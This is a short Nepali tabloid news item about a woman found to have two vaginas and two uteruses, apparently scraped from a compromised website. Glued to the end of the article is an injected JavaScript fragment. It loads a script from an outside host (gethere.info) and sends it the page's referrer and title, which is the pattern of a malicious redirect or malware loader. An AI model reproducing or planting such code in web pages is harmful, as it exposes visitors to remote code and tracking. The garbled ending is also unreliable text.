अनौठी युवती जसका छन् दुईवटा योनी…

एजेन्सी । माथिको शिर्षक पढेर तपाई पनि छक्क पर्नुभयो होला । तर खबर सत्य हो । हेजल जोन्स नाम गरेकी यि सुन्दरी अन्य महिलाहरु भन्दा भिन्न छिन् ।
कारण हो उनका दुई वटा योनी छन् । जुन कुरा उनले आफ्ना प्रेमीले पहिलो यौन सम्बन्ध बनाए पश्चात उनलाई बताएपछि उनले स्वास्थ्य परिक्षण गर्न पुगिन् ।
तर उनको स्वास्थ्य परिक्षण गरेका चिकित्सकले उनका दुई वटा योनी मात्र नभएर पाठेघर पनि दुइवटा भएको बताएपछि उनी छाँगाबाट खसे सरह नै हुन पुगिन् । यस्तो घटना विश्वमै बिरलै मात्रामा हुने गर्दछ ।hazel hazel1s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...